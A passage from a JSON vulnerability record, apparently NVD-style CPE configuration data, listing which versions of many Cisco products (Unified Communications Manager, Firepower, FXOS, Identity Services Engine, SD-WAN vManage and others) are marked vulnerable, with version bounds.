"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "14.4.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.0\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(4\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:contact_center_management_portal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:contact_center_domain_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloud_connect:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:broadworks:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021.11_1.162",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1010:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2110:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2130:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4110:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4112:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4115:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4125:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4145:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_9300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(3.025\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.3\\(0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(0\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.007\\(000.356\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:mobility_services_engine:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite:4.10\\(0.15\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
